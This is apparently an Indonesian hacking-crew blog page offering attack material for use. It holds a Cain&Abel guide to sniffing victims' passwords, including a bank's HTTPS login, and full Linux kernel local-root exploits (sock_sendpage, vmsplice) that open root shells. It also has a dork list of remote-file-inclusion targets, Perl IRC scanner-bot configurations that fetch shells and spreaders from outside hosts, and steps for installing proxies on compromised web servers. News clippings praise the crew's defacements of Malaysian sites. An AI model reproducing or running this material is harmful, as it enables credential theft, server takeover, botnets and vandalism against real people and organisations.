Cara Menggunakan Cain&Abel:
* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark,
tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan
anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password
fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).

Additional Material:

Buat yang udah bisa APRKalo mau curi pass via HTTPS ini caranya (contohnya klik bca, blm pernah g coba beneran cuma baca dari buku):

* Aktifkan APR pada komputer korban
* Saat korban masuk ke klikbca APR secara otomatis akan membuat certificate palsu sehingga data yang akan ditransmisikan menjadi tidak terenkripsi lagi (ini akan menyebabkan tambah banyaknya certificate warning di komputer korban, tetapi kalo dia tidak begitu memperhatikan pasti tidak ketahuan)
* Certificate palsu itu akan terlihat di field https pada program Cain anda
* Setelah korban melakukan login lihatlah log pada bagian https dan klik kanan pilih view
* Dari data tersebut anda dapat mengetahui login password korban (coba cari2 sendiri pasti ketemu).
Silakan dicoba, kalo berhasil jgn lupa share di sini ya… :D

Nessus

In typical operation, Nessus begins by doing a port scan with one of its four internal portscanners (or it can optionally use Amap or Nmap to determine which ports are open on the target and then tries various exploits on the open ports. The vulnerability tests, available as subscriptions, are written in NASL (Nessus Attack Scripting Language), a scripting language optimized for custom network interaction.

Tenable Network Security produces several dozen new vulnerability checks (called plugins) each week, usually on a daily basis. These checks are available for free to the general public; commercial customers are not allowed to use this Home Feed any more. The Professional Feed (which is not free) also give access to support and additional scripts (audit and compliance tests...).

Optionally, the results of the scan can be reported in various formats, such as plain text, XML, HTML and LaTeX. The results can also be saved in a knowledge base for debugging. On UNIX, scanning can be automated through the use of a command-line client. There exist many different commercial, free and open source tools for both UNIX and Windows to manage individual or distributed Nessus scanners.

If the user chooses to do so (by disabling the option 'safe checks'), some of Nessus's vulnerability tests may try to cause vulnerable services or operating systems to crash. This lets a user test the resistance of a device before putting it in production.

Nessus provides additional functionality beyond testing for known network vulnerabilities. For instance, it can use Windows credentials to examine patch levels on computers running the Windows operating system, and can perform password auditing using dictionary and brute force methods. Nessus 3 and later can also audit systems to make sure they have been configured per a specific policy, such as the NSA's guide for hardening Windows servers.

The "Nessus" Project was started by Renaud Deraison in 1998 to provide to the Internet community a free remote security scanner. On October 5, 2005, Tenable Network Security, the company Renaud Deraison co-founded, changed Nessus 3 to a proprietary (closed source) license. The Nessus 3 engine is still free of charge, though Tenable charges $100/month per scanner for the ability to perform configuration audits for PCI, CIS, FDCC and other configuration standards, technical support, SCADA vulnerability audits, the latest network checks and patch audits, the ability to audit anti-virus configurations and the ability for Nessus to perform sensitive data searches to look for credit card, social security number and many other types of corporate data.

In July of 2008, Tenable sent out a revision of the feed license which will allow home users full access to plugin feeds.[5] A professional license is available for commercial use.

The Nessus 2 engine and a minority of the plugins are still GPL, leading to forked open source projects based on Nessus like OpenVAS and Porz-Wahn.Tenable Network Security has still maintained the Nessus 2 engine and has updated it several times since the release of Nessus 3.

Nessus 3 is available for many different UNIX and Windows systems, offers patch auditing of UNIX and Windows hosts without the need for an agent and is 2-5 times faster than Nessus 2.

Download Nessus Free:
1. Nessus For Windows
2. Nessus For Linux

Linux sock_sendpage

/*
* Linux sock_sendpage() NULL pointer dereference
* Copyright 2009 Ramon de Carvalho Valle
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/

/*
* This exploit was written to illustrate the exploitability of this
* vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
* and ppc64.
*
* This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
* The problem, first noticed by Brad Spengler, was described by Red Hat in
* Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
* the mmap_min_addr protection[2].
*
* Support for i386 and x86_64 was added for completeness. For a more complete
* implementation, refer to Brad Spengler's exploit[3], which also implements
* the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
*
* Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
* are vulnerable.
*
* This exploit was tested on:
*
* CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* CentOS 5.3 (2.6.18-128.4.1.el5)
* CentOS 5.3 (2.6.18-128.2.1.el5)
* CentOS 5.3 (2.6.18-128.1.16.el5)
* CentOS 5.3 (2.6.18-128.1.14.el5)
* CentOS 5.3 (2.6.18-128.1.10.el5)
* CentOS 5.3 (2.6.18-128.1.6.el5)
* CentOS 5.3 (2.6.18-128.1.1.el5)
* CentOS 5.3 (2.6.18-128.el5)
* CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* CentOS 4.8 (2.6.9-89.0.7.EL)
* CentOS 4.8 (2.6.9-89.0.3.EL)
* CentOS 4.8 (2.6.9-89.EL)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
* Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
* Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
* Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
* SUSE Linux Enterprise Server 11 (2.6.27.19-5)
* SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
* Ubuntu 8.10 (2.6.27-14) is not vulnerable
* Ubuntu 8.10 (2.6.27-11)
* Ubuntu 8.10 (2.6.27-9)
* Ubuntu 8.10 (2.6.27-7)
*
* For i386 and ppc, compile with the following command:
* gcc -Wall -o linux-sendpage linux-sendpage.c
*
* And for x86_64 and ppc64:
* gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
*
* [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
* [2] http://kbase.redhat.com/faq/docs/DOC-18042
* [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
* [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
*/

View All

Linux kernel 2.4/2.6

/*
**
** 0x82-CVE-2009-2692
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** spender and venglin's code is very excellent.
** Thankful to them.
**
** Greets: Brad Spengler ,
** Przemyslaw Frasunek .
** --
** exploit by .
**
** "Slow and dirty exploit for this one"
**
*/

#include
#include
#include
#include
#include
#include

unsigned int uid, gid;

void kernel_code()
{
unsigned long where=0;
unsigned long *pcb_task_struct;

where=(unsigned long )&where;
where&=~8191;
pcb_task_struct=(unsigned long *)where;

while(pcb_task_struct){
if(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&
pcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&
pcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&
pcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){
pcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;
pcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;
break;
}
pcb_task_struct++;
}
return;
/*
** By calling iret after pushing a register into kernel stack,
** We don't have to go back to ring3(user mode) privilege level. dont worry. :-}
**
** kernel_code() function will return to its previous status which means before sendfile() system call,
** after operating upon a ring0(kernel mode) privilege level.
** This will enhance the viablity of the attack code even though each kernel can have different CS and DS address.
*/
}
void *kernel=kernel_code;

int main(int argc,char *argv[])
{
int fd_in=0,fd_out=0,offset=1;
void *zero_page;

uid=getuid();
gid=getgid();
if(uid==0){
fprintf(stderr,"[-] check ur uid\n");
return -1;
}

/*
** There are some cases that we need mprotect due to the dependency matter with SVR4. (however, I did not confirm it yet)
*/
if(personality(0xffffffff)==PER_SVR4){
if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
perror("[-] mprotect()");
return -1;
}
}
else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
perror("[-] mmap()");
return -1;
}
*(char *)0x00000000=0xff;
*(char *)0x00000001=0x25;
*(unsigned long *)0x00000002=(unsigned long)&kernel;
*(char *)0x00000006=0xc3;

if((fd_in=open(argv[0],O_RDONLY))==-1){
perror("[-] open()");
return -1;
}
if((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){
if((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){
perror("[-] socket()");
return -1;
}
}
gogossing:
/*
** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,
** an attacker can make all the processes runing under current user uid 0.
*/
if(sendfile(fd_out,fd_in,&offset,2)==-1){
if(offset==0){
perror("[-] sendfile()");
return -1;
}
close(fd_out);
fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);
}
if(getuid()==uid){
if(offset){
offset=0;
}
goto gogossing; /* all process */
}
close(fd_in);
close(fd_out);

execl("/bin/sh","sh","-i",NULL);
return 0;
}

/* eoc */

Kernel 2.6.17

/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");

if (!uid || !gid)
die("!@#$", 0);

/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}

Download All

Bug&dork New

.scan /index.php?_SERVER[DOCUMENT_ROOT]= “powered by Clicknet CMS”
.scan /include/admin.lib.inc.php?site_path= “rgboard
.scan /header.php?base_folder= “Powered by Bab.stats”
.scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path= “/index.php?option=com_content”
.scan /admin.php?include_path= “Guestbook”
.scan //main.php?_zb_path= “main.php”
.scan //login.php?_zb_path= “login.php”
.scan /////?_SERVER[DOCUMENT_ROOT]= “/board” site:.kr
.scan /admin.php?include_path= “gastenboek”
.scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework= “doceboLms”
.scan /encapscms_PATH/core/core.php?root= “encapscms 0.3.6″ “encapscms 0.3.6″
.scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= “/PNphpBB2/”
.scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= “PHP-NUKE”
.scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
.scan /index.php?DOCUMENT_ROOT= “netcat_files”
.scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath= “boonex”
.scan /?page= /?pagedb=?
.scan ?sourcedir= index.php?sourcedir=
.scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH= “web3news”
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= “/plugins/sniplets/”

Meffy Scanner

***************************
AUTOR: Contrex
DATE :Desember 2009
LINGUAGE: perl (.pl)
**************************

#################################
#!/usr/bin/perl ##
# Meffy ~ RoScan.Net ##
# Author: PRIV8 ##
# RoScan-Team production ##
# We Are R0X ##
#################################
use MIME::Base64;



$process = "/sbin/mingetty"; ## process
my $printcmd = "http://www.vagina.com/sh.txt"; ## r57;c99 shell
my $id = "http://www.vagina.com/id.txt"; ## ID is private
my $spread = "http://www.vagina.com/pbotz.txt"; ## spread
my $ircserver = "irc.indonesiancoder.us" ; ## ur irc server
my $start = "!scan"; ## command to start scan
my $port = "6667"; ## irc server port
my $nickname = "[Scan][" . int( rand(99) ) . "]"; ## nickname
my $admin = "arianom"; ## msg prv
my $channel = "#kill-9"; ## chan
my $chanres = "#kill-9"; ## channel print result
my $verz = "uname -a\n";

print "\n";
print "RFI Start !!\n";
print "--PRIV8--\n";
print "Release $verz\n";
print "Now join $ircserver:$port\n";
print "$channel and $chanres\n";
print "GO GO ;)\n\n";


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;


Download [Full Id]

Albania Scanner

***************************
AUTOR: Abah_benu
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


my $linas_max='10';
my $sleep='1';
my $processo = "httpd -SasSL45";
my $cmd="http://henry14.isfreeweb.com/sh???";
my $id="http://henry14.isfreeweb.com/id.txt???";
my $spread="http://henry14.isfreeweb.com/spread.txt???";
my $server="irc.kamtiez.punked.us";
my $porta="7000";
my $numero=int(rand(100));
my $nick="NabiLa[".$numero."]";
my $canale="#kill-9";
my $verbot = "1.01";
my $stringa = "!scan".$numero;
my $adm = "arianom";
my $out = "".$numero;
my $c0der= "arianom"; #si prega di lasciarlo cos?


Download [lengkap + id]

Defacing malaysuck site

JAKARTA - Seorang hacker yang mengaku bernama Arianom berhasil membobol forum pendukung partai incumbent Malaysia, UMNO.

"Site Down. Stop penyiksaan terhadap warga negara Indonesia," tulis sang hacker yang ditinggalkan dalam situs tersebut, lengkap dengan gambar sebuah tengkorak bajak laut yang sedang menggigit golok.

Ditelusuri okezone, Sabtu (8/8/2009), aksi ini ternyata telah dilakukan 'arianom' sejak Jumat (7/8/2009) sore kemarin. Sayangnya hingga saat ini situs yang bertajuk 'Kelab Maya UMNO' ini masih belum bisa diakses sama sekali.

Kelab Maya United Malaysian National Organizations (UMNO) ini sebenarnya lebih ditujukan sebagai ajang diskusi antarpenggemar UMNO. Isi berita dan diskusi yang dilayangkan kebanyakan berkutat mengenai langkah musuh-musuh UMNO, khususnya Anwar Ibrahim, dalam menjatuhkan partai milik Mahathir Muhammad dan Najib Tun Razak ini.

Selain itu, berita mengenai keberhasilan kader dan anggota partai memasuki kabinet pemerintahan juga menghiasi situs ini.

Sayangnya, berita sukses tersebut harus rela menghilang dan tergantikan dengan gambar aneh milik sang hacker, Arianom, yang mengaku berasal dari kelompok hacker 'all kill-9 crew'. (srn)

Defacing malaysian site

VIVAnews - Meski polemik soal penayangan Tari Pendet dalam iklam 'Enigmatic Malaysia' di Discovery Channel dan sengketa Pulau Jemur, sudah mereda, bukan berarti sentimen anti negeri jiran, Malaysia lalu menghilang.

Sekelompok cracker yang mengatasnamakan diri sebagai 'Arianom' mengambil alih situs Malaysia, http://pkgparitraja.com pada Jumat 25 September 2009 pukul 21.13 WIB.

Berdasarkan penelusuran VIVAnews, situs tersebut adalah milik Pusat Kegiatan Guru Parit Raja, Batu Pahat, yang beralamat di SK Pintas Puding, Km 21 Jalan Pintas Puding, 86400 Parit Raja, Batu Pahat Johor, Malaysia.

Mulai Jumat malam tadi, situs tersebut tak bisa diakses dan diubah tampilannya, alias deface.

Dalam laman tersebut, kini tertera kalimat 'Hacked by Arianom. Situs ini diklaim oleh rakyat Indonesia sebagai bentuk balasan atas pengklaiman beberapa kebudayaan Indonesia oleh pemerintah Malaysia."

Di tengah bendera Malaysia, 'jalur gemilang' juga ditulisi kalimat "Situs ini Diklaim oleh Rakyat Indonesia. Hacked by Arianom, Kill-9 Crew."

Barisan kalimat yang mirip protes dituliskan dalam laman tersebut. Berikut bunyinya:

"Kalian boleh sebut kami indon. Kami sebut kalian malingsia, maling kekayaan dan budaya Indonesia.

Kami menghimbau agar pemerintah Malaysia menghentikan dan mengembalikan beberapa budaya yang telah diklaim oleh Malaysia,

Silahkan klaim aja itu Noordin M Top, kami rasa dia asset Malaysia yang sangat berharga."

Sebelum aksi ini, tepat di peringatan kemerdekaan Malaysia ke 52 pada 31 Agustus 2009, sejumlah cracker mengubah tampilan sejumlah situs milik Malaysia.
• VIVAnews

Rose Scanner

***************************
AUTOR: Tukulesto
DATE :December 2008
LINGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

########################################
## Multi RFI - SCAN Commands ##
## By TuX_Sh4D0W ##
## Released : 11 December 2008 ##
## ---------------------------------- ##
##.---..-..-..-.,-..-..-..-. .---.. ##
##`| |'| || || . < | || || |__ | |- \##
## `-' `----'`-'`-'`----'`----'`---'`-##
##------------------------------------##
########################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


###################
## CONFIGURATION ##
###################

my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
my $shell = "http://styrovit.ru/includes/sh.txt??";
my $pbot = "http://styrovit.ru/includes/pbotz.txt??";
my $spread = "http://www.bwdi.or.kr/bbs/spread-rose.txt??";
#my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
#my $shell = "http://styrovit.ru/includes/sh.txt??";

@ircservers = (

"209.41.180.98",

#"localhost",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98"

);


Download [lengkap + id]

About | MIRC

IRC adalah singkatan dari Internet Relay Chat. Secara kasar, IRC adalah media untuk berbicara real time dengan orang lain di Internet. IRC bekerja seperti radio CB, hanya saja ente mengetikkan semuanya apa yang ingin bicarakan pada keyboard dan ente dapat berbicara dengan semua orang. ente pun dapat melihat ketikan orang lain pada layar monitor.

Internet Relay Chat diciptakan pada tahun ‘80an hasil dari penyempurnaan komunikasi antar UNIX. Ketika berkomunukasi antar dua orang atau lebih secara hampir bersamaan. IRC adalah jaringan server yang menrelai percakapan dari pengguna yang terkoneksi pada server tersebut. Jaringan IRC tersebar di seluruh dunia. Siapa saja, di mana saja, dengan mempergunakan internet koneksi dapat berpartisipasi untuk ikut.

Banyak sekali channels diskusi pada IRC. ente dapat bergabung pada diskusi setelah ente memilih nick name dan bergabung di channel. Jika ingin mencoba IRC, ente dapat download MIRC dari official sites mereka.
Untuk memulai, tahap standar adalah sebagai berikut:

Semua perintah diawali dengan tanda slash ('/')
Pertama gabung server (banyak server di dunia ini), misalnya /server irc-2.texas.net
Pilih nick name misal: /nick anakblue
Untuk melihat daftar channel yang ada, ketik /list
Gabung channel, misalnya /join #kill-9
Bicara deh....


Gampangnya... ente bisa download script2 yang udah ready dengan shortcut/perintah pendek dengan bermacam-macam variasi:

* Mirc601.exe (1.2 MB) > Ini yang standar buanget !!
* Mr^P^.zip (1.9 MB) > (Thanks to Projo...)
* Boss2002.zip (3.2 MB)
* GeniusIRC2.exe (4.7 MB)

Make Proxy From Shell

Mungkin kita sudah tidak asing lagi dengan yang nama nya proxy…. Kalo saya definisikan proxy adalah sebuah mirror yang penggunaannya ditujukan untuk sebuah private yang berguna untuk menyamarkan ip address kita. Kali ini akan dijelaskan sedikit cara membuat proxy melalui shell dari sebuah web hasil injectkan.

Aku anggap kamu sudah bisa inject shell and let’s go to begin..

* masuk ke shell yang kita inject
* cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d” jika ga ada, langsung aja menuju direktori /tmp
* wget file proxynya . commandnya “wget url/file” contoh: “wget http://3xploit.110mb.com/proxy.tgz” jika ga berhasil, coba pake command lwp-download atau fetch tapi dengan url yang lengkap, contoh commandnya “lwp-download http://3xploit.110mb.com/proxy.tgz
* kalo tidak bisa juga, pakailah script injectkan r57 ato c99 sehingga ada fitur untuk uploadnya. dan uploadlah file proxy.tgz dengan fitur tersebut. jika belum punya filenya, donlot saja secara manual di http://3xploit.110mb.com/proxy.tgz dan kemudian di upload.
* extract filenya dengan command “tar -zxvf proxy.tgz”
* setelah diextract, masuk ke direktori pro dengan command “cd pro”
* eksekusi file xh, commandnya adalah “ ./xh -s ./httpd ./prox -a -d -p5050”
* cek hidup atau tidaknya proxy kamu di IRC channel yang terdapat bot untuk cek ip. contohnya adalah #kill-9 @irc.indonesiancoder.us
* command untuk ceknya biasanya bervariasi. tapi kurang lebih seperti ini “.port ip 5050” contohnya”.port 122.168.9.70 5050”

Ket:

* Deafult port diatas adalah 5050 dan dapat di edit pada sesuai keinginan kita pada “menu.conf”
* Ini adalah tutor untuk pembuatan proxy pada web hasil inject
* Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
* Semua command di atas tanpa tanda petik dua (”)

Rafly Scanner

#!/usr/bin/perl

#################################
## CERME RFI Scanner Bot v2.4 ##
## By Rafly ##
## Copyleft July 2008 ##
## Usage: perl ussil.pl ##
#################################

use IO::Socket::INET;
